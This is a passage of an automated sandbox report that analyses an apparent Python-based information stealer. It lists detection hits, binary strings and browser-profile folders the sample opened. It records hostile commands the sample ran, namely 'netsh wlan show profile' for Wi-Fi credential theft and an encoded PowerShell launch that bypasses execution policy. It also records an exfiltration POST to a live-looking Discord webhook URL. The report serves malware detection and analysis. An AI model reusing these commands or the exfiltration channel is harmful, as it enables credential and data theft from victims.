              Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bohkan2x\bohkan2x.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bohkan2x\bohkan2x.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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

              Stealing of Sensitive Information

              barindex
              Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\system32\cmd.exe /c "netsh wlan show profile", CommandLine: C:\Windows\system32\cmd.exe /c "netsh wlan show profile", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\e45AiBoV6X.exe", ParentImage: C:\Users\user\Desktop\e45AiBoV6X.exe, ParentProcessId: 7396, ParentProcessName: e45AiBoV6X.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "netsh wlan show profile", ProcessId: 6556, ProcessName: cmd.exe
              No Snort rule has matched


              AV Detection

              barindex
              Source: e45AiBoV6X.exeVirustotal: Detection: 50%
              Source: e45AiBoV6X.exeReversingLabs: Detection: 47%
              Source: Submitted SampleIntegrated Neural Analysis Model: Matched 99.2% probability
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeCode function: 65_2_00007FF629B0901C CryptAcquireContextW,CryptGenRandom,CryptReleaseContext,65_2_00007FF629B0901C
              Source: e45AiBoV6X.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
              Source: Binary string: D:\_w\1\b\bin\amd64\_lzma.pdbMM source: e45AiBoV6X.exe, 00000001.00000002.1995160650.00007FFE1025B000.00000040.00000001.01000000.00000008.sdmp
              Source: Binary string: D:\_w\1\b\bin\amd64\select.pdb source: e45AiBoV6X.exe, 00000001.00000002.1997954782.00007FFE130C1000.00000040.00000001.01000000.0000000D.sdmp
              Source: Binary string: D:\_w\1\b\bin\amd64\sqlite3.pdb source: e45AiBoV6X.exe, 00000001.00000002.1993602283.00007FFDFF191000.00000040.00000001.01000000.0000000B.sdmp
              Source: Binary string: D:\_w\1\b\bin\amd64\_sqlite3.pdb source: e45AiBoV6X.exe, 00000001.00000002.1996506357.00007FFE11EA1000.00000040.00000001.01000000.0000000A.sdmp
              Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_A source: e45AiBoV6X.exe
              Source: Binary string: D:\_w\1\b\libssl-1_1.pdb source: e45AiBoV6X.exe, e45AiBoV6X.exe, 00000001.00000002.1991624093.00007FFDFB3F5000.00000040.00000001.01000000.0000000F.sdmp
              Source: Binary string: D:\_w\1\b\bin\amd64\python310.pdb source: e45AiBoV6X.exe, 00000001.00000002.1992435238.00007FFDFB77F000.00000040.00000001.01000000.00000004.sdmp
              Source: Binary string: D:\_w\1\b\bin\amd64\_bz2.pdb source: e45AiBoV6X.exe, 00000001.00000002.1997119035.00007FFE126C1000.00000040.00000001.01000000.00000009.sdmp
              Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASM source: e45AiBoV6X.exe, 00000001.00000002.1990278020.00007FFDFB24F000.00000040.00000001.01000000.00000010.sdmp
              Source: Binary string: D:\_w\1\b\bin\amd64\_queue.pdb source: e45AiBoV6X.exe, 00000001.00000002.1997695526.00007FFE12E11000.00000040.00000001.01000000.00000012.sdmp
              Source: Binary string: D:\_w\1\b\bin\amd64\_ssl.pdb source: e45AiBoV6X.exe, 00000001.00000002.1994462832.00007FFE0EC41000.00000040.00000001.01000000.0000000E.sdmp
              Source: Binary string: D:\_w\1\b\bin\amd64\_hashlib.pdb source: e45AiBoV6X.exe, 00000001.00000002.1994882993.00007FFE101D1000.00000040.00000001.01000000.00000011.sdmp
              Source: Binary string: D:\_w\1\b\bin\amd64\_lzma.pdb source: e45AiBoV6X.exe, 00000001.00000002.1995160650.00007FFE1025B000.00000040.00000001.01000000.00000008.sdmp
              Source: Binary string: \bx.pdb source: powershell.exe, 00000025.00000002.1868678671.00000296ED014000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\Projects\WinRAR\rar\build\rar64\Release\RAR.pdb source: rar.exe, 00000041.00000002.1896878697.00007FF629B60000.00000002.00000001.01000000.0000001A.sdmp, rar.exe, 00000041.00000000.1882689611.00007FF629B60000.00000002.00000001.01000000.0000001A.sdmp
              Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASMOpenSSL 1.1.1n 15 Mar 2022built on: Tue Mar 15 18:32:50 2022 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-1_1"not available source: e45AiBoV6X.exe, 00000001.00000002.1990278020.00007FFDFB24F000.00000040.00000001.01000000.00000010.sdmp
              Source: Binary string: 7C:\Users\user\AppData\Local\Temp\bohkan2x\bohkan2x.pdb source: powershell.exe, 00000025.00000002.1843488107.0000029680385000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: d:\a01\_work\12\s\\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: e45AiBoV6X.exe, 00000000.00000003.1716520142.000001F32EEDF000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000001.00000002.1997442294.00007FFE126F1000.00000002.00000001.01000000.00000005.sdmp, VCRUNTIME140.dll.0.dr
              Source: Binary string: D:\_w\1\b\bin\amd64\_ctypes.pdb source: e45AiBoV6X.exe, 00000001.00000002.1996803109.00007FFE11EC1000.00000040.00000001.01000000.00000006.sdmp
              Source: Binary string: D:\_w\1\b\libssl-1_1.pdb@@ source: e45AiBoV6X.exe, 00000001.00000002.1991624093.00007FFDFB3F5000.00000040.00000001.01000000.0000000F.sdmp
              Source: Binary string: D:\_w\1\b\bin\amd64\_socket.pdb source: e45AiBoV6X.exe, 00000001.00000002.1995817192.00007FFE10301000.00000040.00000001.01000000.0000000C.sdmp
              Source: Binary string: 7C:\Users\user\AppData\Local\Temp\bohkan2x\bohkan2x.pdbhP source: powershell.exe, 00000025.00000002.1843488107.0000029680385000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: D:\_w\1\b\bin\amd64\unicodedata.pdb source: e45AiBoV6X.exe, 00000001.00000002.1989811289.00007FFDFAFEC000.00000040.00000001.01000000.00000013.sdmp
              Source: Binary string: D:\_w\1\b\libcrypto-1_1.pdb source: e45AiBoV6X.exe, e45AiBoV6X.exe, 00000001.00000002.1990278020.00007FFDFB2D1000.00000040.00000001.01000000.00000010.sdmp
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 0_2_00007FF6FB1E79B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00007FF6FB1E79B0
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 0_2_00007FF6FB1E85A0 FindFirstFileExW,FindClose,0_2_00007FF6FB1E85A0
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 0_2_00007FF6FB200B84 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00007FF6FB200B84
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FF6FB1E85A0 FindFirstFileExW,FindClose,1_2_00007FF6FB1E85A0
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FF6FB200B84 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,1_2_00007FF6FB200B84
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FF6FB1E79B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,1_2_00007FF6FB1E79B0
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB003229 MultiByteToWideChar,GetLastError,MultiByteToWideChar,MultiByteToWideChar,00007FFE1FF9F020,FindFirstFileW,FindNextFileW,WideCharToMultiByte,1_2_00007FFDFB003229
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeCode function: 65_2_00007FF629B146EC FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,65_2_00007FF629B146EC
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeCode function: 65_2_00007FF629B0E21C FindFirstFileW,FindClose,CreateFileW,DeviceIoControl,CloseHandle,65_2_00007FF629B0E21C
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeCode function: 65_2_00007FF629B588E0 FindFirstFileExA,65_2_00007FF629B588E0
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg
              Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
              Source: Joe Sandbox ViewIP Address: 162.159.137.232 162.159.137.232
              Source: unknownDNS query: name: ip-api.com
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /json/?fields=225545 HTTP/1.1Host: ip-api.comAccept-Encoding: identityUser-Agent: python-urllib3/2.2.2
              Source: e45AiBoV6X.exe, 00000001.00000002.1988000626.000002290B678000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: `https://www.facebook.com/ equals www.facebook.com (Facebook)
              Source: global trafficDNS traffic detected: DNS query: ip-api.com
              Source: global trafficDNS traffic detected: DNS query: canary.discord.com
              Source: unknownHTTP traffic detected: POST /api/webhooks/1248781366489907321/ufb6qyCKcRyE7syQfJqh1lNQR64inZBSWaeenuFVMnWhurxQmS0fvG_72iP5niS7D08V HTTP/1.1Host: canary.discord.comAccept-Encoding: identityContent-Length: 696330User-Agent: python-urllib3/2.2.2Content-Type: multipart/form-data; boundary=ee98191e18960bbd7c200f93a176e816
              Source: e45AiBoV6X.exe, 00000000.00000003.1718378444.000001F32EEDF000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000000.00000003.1718073686.000001F32EEDF000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000000.00000003.1718378444.000001F32EEEC000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000000.00000003.1718495170.000001F32EEDF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
              Source: e45AiBoV6X.exe, 00000000.00000003.1718378444.000001F32EEDF000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000000.00000003.1718378444.000001F32EEEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
              Source: e45AiBoV6X.exe, 00000000.00000003.1718073686.000001F32EEDF000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000000.00000003.1718495170.000001F32EEDF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
              Source: e45AiBoV6X.exe, 00000000.00000003.1716755215.000001F32EEDF000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000000.00000003.1717360378.000001F32EEDF000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000000.00000003.1717532806.000001F32EEDF000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000000.00000003.1716650900.000001F32EEDF000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000000.00000003.1718073686.000001F32EEDF000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000000.00000003.1717278890.000001F32EEDF000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000000.00000003.1720356944.000001F32EEDF000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000000.00000003.1717046095.000001F32EEDF000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000000.00000003.1720685232.000001F32EEDF000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000000.00000003.1717449095.000001F32EEDF000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000000.00000003.1717157218.000001F32EEDF000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000000.00000003.1720465191.000001F32EEDF000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000000.00000003.1718703351.000001F32EEDF000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000000.00000003.1718495170.000001F32EEDF000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000000.00000003.1716876417.000001F32EEDF000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.dr, _socket.pyd.0.dr, _ssl.pyd.0.dr, _ctypes.pyd.0.dr, _hashlib.pyd.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
              Source: e45AiBoV6X.exe, 00000000.00000003.1716755215.000001F32EEDF000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000000.00000003.1717360378.000001F32EEDF000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000000.00000003.1717532806.000001F32EEDF000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000000.00000002.1998861358.000001F32EEEC000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000000.00000003.1716650900.000001F32EEDF000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000000.00000003.1720356944.000001F32EEEC000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000000.00000003.1717278890.000001F32EEDF000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000000.00000003.1720356944.000001F32EEDF000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000000.00000003.1717046095.000001F32EEDF000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000000.00000003.1720685232.000001F32EEDF000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000000.00000003.1717449095.000001F32EEDF000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000000.00000003.1717157218.000001F32EEDF000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000000.00000003.1717278890.000001F32EEEC000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000000.00000003.1720465191.000001F32EEDF000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000000.00000003.1718703351.000001F32EEDF000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000000.00000003.1716876417.000001F32EEDF000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.dr, _socket.pyd.0.dr, _ssl.pyd.0.dr, _ctypes.pyd.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
              Source: e45AiBoV6X.exe, 00000000.00000003.1716755215.000001F32EEDF000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000000.00000003.1717360378.000001F32EEDF000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000000.00000003.1717532806.000001F32EEDF000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000000.00000002.1998861358.000001F32EEEC000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000000.00000003.1716650900.000001F32EEDF000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000000.00000003.1720356944.000001F32EEEC000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000000.00000003.1718073686.000001F32EEDF000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000000.00000003.1717278890.000001F32EEDF000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000000.00000003.1720356944.000001F32EEDF000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000000.00000003.1717046095.000001F32EEDF000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000000.00000003.1720685232.000001F32EEDF000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000000.00000003.1717449095.000001F32EEDF000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000000.00000003.1717157218.000001F32EEDF000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000000.00000003.1717278890.000001F32EEEC000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000000.00000003.1720465191.000001F32EEDF000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000000.00000003.1718703351.000001F32EEDF000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000000.00000003.1718495170.000001F32EEDF000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000000.00000003.1716876417.000001F32EEDF000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.dr, _socket.pyd.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
              Source: e45AiBoV6X.exe, 00000001.00000003.1761395137.000002290B00C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comod
              Source: e45AiBoV6X.exe, 00000000.00000003.1719392220.000001F32EEDF000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000000.00000002.1998861358.000001F32EEC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
              Source: e45AiBoV6X.exe, 00000001.00000002.1986630728.000002290AF8B000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000001.00000002.1986264729.000002290AEB5000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000001.00000002.1985975693.000002290ACD0000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000001.00000003.1761395137.000002290B00C000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000001.00000003.1983212942.000002290AEB4000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000001.00000003.1984164140.000002290AF88000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1948422681.0000021959CC0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.1868678671.00000296ECF80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
              Source: e45AiBoV6X.exe, 00000000.00000002.1998861358.000001F32EEC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
              Source: e45AiBoV6X.exe, 00000000.00000003.1719392220.000001F32EEDF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
              Source: e45AiBoV6X.exe, 00000000.00000003.1719392220.000001F32EEDF000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000000.00000003.1718378444.000001F32EEDF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
              Source: e45AiBoV6X.exe, 00000000.00000003.1717449095.000001F32EEDF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/Digi
              Source: e45AiBoV6X.exe, 00000000.00000003.1718378444.000001F32EEDF000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000000.00000003.1718378444.000001F32EEEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
              Source: e45AiBoV6X.exe, 00000000.00000003.1718073686.000001F32EEDF000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000000.00000003.1718495170.000001F32EEDF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
              Source: e45AiBoV6X.exe, 00000000.00000003.1716755215.000001F32EEDF000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000000.00000003.1717360378.000001F32EEDF000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000000.00000003.1717532806.000001F32EEDF000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000000.00000003.1716650900.000001F32EEDF000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000000.00000003.1718073686.000001F32EEDF000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000000.00000003.1717278890.000001F32EEDF000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000000.00000003.1720356944.000001F32EEDF000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000000.00000003.1717046095.000001F32EEDF000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000000.00000003.1720685232.000001F32EEDF000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000000.00000003.1717449095.000001F32EEDF000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000000.00000003.1717157218.000001F32EEDF000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000000.00000003.1720465191.000001F32EEDF000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000000.00000003.1718703351.000001F32EEDF000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000000.00000003.1718495170.000001F32EEDF000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000000.00000003.1716876417.000001F32EEDF000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.dr, _socket.pyd.0.dr, _ssl.pyd.0.dr, _ctypes.pyd.0.dr, _hashlib.pyd.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
              Source: e45AiBoV6X.exe, 00000000.00000003.1716755215.000001F32EEDF000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000000.00000003.1717360378.000001F32EEDF000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000000.00000003.1717532806.000001F32EEDF000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000000.00000002.1998861358.000001F32EEEC000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000000.00000003.1716650900.000001F32EEDF000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000000.00000003.1720356944.000001F32EEEC000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000000.00000003.1717278890.000001F32EEDF000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000000.00000003.1720356944.000001F32EEDF000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000000.00000003.1717046095.000001F32EEDF000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000000.00000003.1720685232.000001F32EEDF000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000000.00000003.1717449095.000001F32EEDF000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000000.00000003.1717157218.000001F32EEDF000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000000.00000003.1717278890.000001F32EEEC000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000000.00000003.1720465191.000001F32EEDF000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000000.00000003.1718703351.000001F32EEDF000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000000.00000003.1716876417.000001F32EEDF000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.dr, _socket.pyd.0.dr, _ssl.pyd.0.dr, _ctypes.pyd.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
              Source: python310.dll.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
              Source: e45AiBoV6X.exe, 00000000.00000003.1718378444.000001F32EEDF000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000000.00000003.1718378444.000001F32EEEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
              Source: e45AiBoV6X.exe, 00000000.00000003.1718073686.000001F32EEDF000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000000.00000003.1718495170.000001F32EEDF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
              Source: e45AiBoV6X.exe, 00000000.00000003.1718378444.000001F32EEDF000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000000.00000003.1718073686.000001F32EEDF000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000000.00000003.1718378444.000001F32EEEC000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000000.00000003.1718495170.000001F32EEDF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
